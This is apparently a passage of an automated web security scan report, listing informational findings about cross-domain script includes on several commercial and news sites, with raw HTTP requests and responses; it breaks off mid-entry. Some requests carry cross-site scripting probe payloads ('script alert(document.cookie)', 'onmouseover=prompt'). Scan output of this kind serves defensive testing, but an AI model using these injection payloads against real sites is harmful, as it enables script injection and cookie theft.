Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
</a>
                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=acquisio"></script>
...[SNIP]...
</script>


<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
11.39. http://www.clickability.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickability.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/html;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:06 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 82256

                       
                                                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
</div>
               <script type="text/javascript" charset="UTF-8" src="https://server.iad.liveperson.net/hc/47227738/?cmd=mTagRepstate&site=47227738&buttonID=13&divID=lpButDivID-1295917182789&bt=1&c=1"></script>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com -->
<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=65463fcf-37115-1e57677d-3482-472e-8cb4-4858ee605734&lID=1&loc=4Q-WEB2" type="text/javascript" defer="defer" >
</script>
...[SNIP]...
<!-- Begin Salesforce Tracking Code -->
<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
   </script>
...[SNIP]...
11.40. http://www.foxnews.com/politics/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /politics/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /politics/index.html HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined; rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=103
Date: Mon, 11 Apr 2011 16:21:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 97734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoc
...[SNIP]...
<div class="deck"><script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/w/28822.js"></script>
...[SNIP]...
11.41. http://www.ingeniux.com/resources/solutions-articles/mobile-content-deployment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ingeniux.com
Path:   /resources/solutions-articles/mobile-content-deployment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /resources/solutions-articles/mobile-content-deployment HTTP/1.1
Host: www.ingeniux.com
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LOOPFUSE=ebd94f8a-082f-4397-b307-6476c23d9589; __utmz=42806781.1302308290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42806781.695398080.1302308290.1302308290.1302308290.1; __utmc=42806781; __utmb=42806781.1.10.1302308290

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 00:22:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t3.trackalyzer.com/trackalyze.js"></script>
</div>
</div>
<script src="http://lfov.net/webrecorder/js/listen.js" type="text/Javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...
11.42. http://www.ingeniux.com/solutions/website_optimization  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ingeniux.com
Path:   /solutions/website_optimization

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solutions/website_optimization HTTP/1.1
Host: www.ingeniux.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 00:17:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t3.trackalyzer.com/trackalyze.js"></script>
</div>
</div>
<script src="http://lfov.net/webrecorder/js/listen.js" type="text/Javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...
11.43. http://www.internetrix.net/page/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/contact-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /page/contact-us/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.htmla124a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef5e119e82d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.2.10.1302308294

Response

HTTP/1.1 200
Date: Sat, 09 Apr 2011 00:20:05 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Co
...[SNIP]...
</table>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAA8rGRAe8zAUtnQVqSEBuubxTS7esERBzMwv-0kXl1v5oJ3WaSchQB5mie5Zlvu2-DapDadQtDeuwUtQ" type="text/javascript"></script>
...[SNIP]...
11.44. http://www.marqui.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marqui.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.marqui.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:15 GMT
Server: Microsoft-IIS/6.0
ServerName: Web01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2bwdtg55kc1vdz454wahsa45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19066
Set-Cookie: LBWEB0102=4090937773.1.3687065408.2276017286; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page updated by Marqui on: 4/8/2011 6:05:11 AM marqui2010 p1s3 6.7.0000.
...[SNIP]...
<body><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
11.45. http://www.marqui.com/company/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marqui.com
Path:   /company/contact-us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/contact-us/ HTTP/1.1
Host: www.marqui.com
Proxy-Connection: keep-alive
Referer: http://www.marqui.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hwhwdtmo2gobqyfa1xxqnu45; LBWEB0102=4090937773.1.3687065408.2276017286

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:21:56 GMT
Server: Microsoft-IIS/6.0
ServerName: Web01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page updated by Marqui on: 12/17/2010 2:22:36 PM marqui2010 p133s1 6.6
...[SNIP]...
<body><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=xa-4b26b1da52dca38c"></script>
...[SNIP]...
11.46. http://www.marqui.com/images/global/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marqui.com
Path:   /images/global/loadingAnimation.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/global/loadingAnimation.gif HTTP/1.1
Host: www.marqui.com
Proxy-Connection: keep-alive
Referer: http://www.marqui.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hwhwdtmo2gobqyfa1xxqnu45; LBWEB0102=4090937773.1.3687065408.2276017286

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:55 GMT
Server: Microsoft-IIS/6.0
ServerName: Web01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page updated by Marqui on: 4/8/2011 6:05:11 AM marqui2010 p1s3 6.7.0000.
...[SNIP]...
<body><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
11.47. http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /Google-Website-Optimizer-Technology-Partner.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Google-Website-Optimizer-Technology-Partner.aspx HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 09 Apr 2011 00:18:35 GMT
Set-Cookie: ASP.NET_SessionId=3wberx45beiwegerbeufdma2; path=/; HttpOnly
Set-Cookie: X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; path=/
X-Powered-By: ASP.NET
Content-Length: 51374


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Google Web
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
11.48. http://www.motivitycms.com/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.aspx HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/motivity-customers.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.2.10.1302308295

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2011 00:21:46 GMT
Content-Length: 39698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Contact Mo
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
11.49. http://www.motivitycms.com/motivity-customers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /motivity-customers.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /motivity-customers.aspx HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2011 00:21:44 GMT
Content-Length: 28946


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ecommerce
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
11.50. http://www.mvtimes.com/archives/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /archives/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/ HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/expired.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.2.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:16:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 51167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/Templates/gene
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
11.51. http://www.mvtimes.com/expired.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /expired.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /expired.php HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.1.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
11.52. http://www.mvtimes.com/marthas-vineyard/article.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /marthas-vineyard/article.php?id=4030 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 30930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mvtimes"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
11.53. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:15:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 29415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mvtimes"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
11.54. http://www.mvtimes.com/marthas-vineyard/directory/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/directory/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /marthas-vineyard/directory/?a=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/on-island.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.4.10.1302621734

Response

HTTP/1.1 200 OK
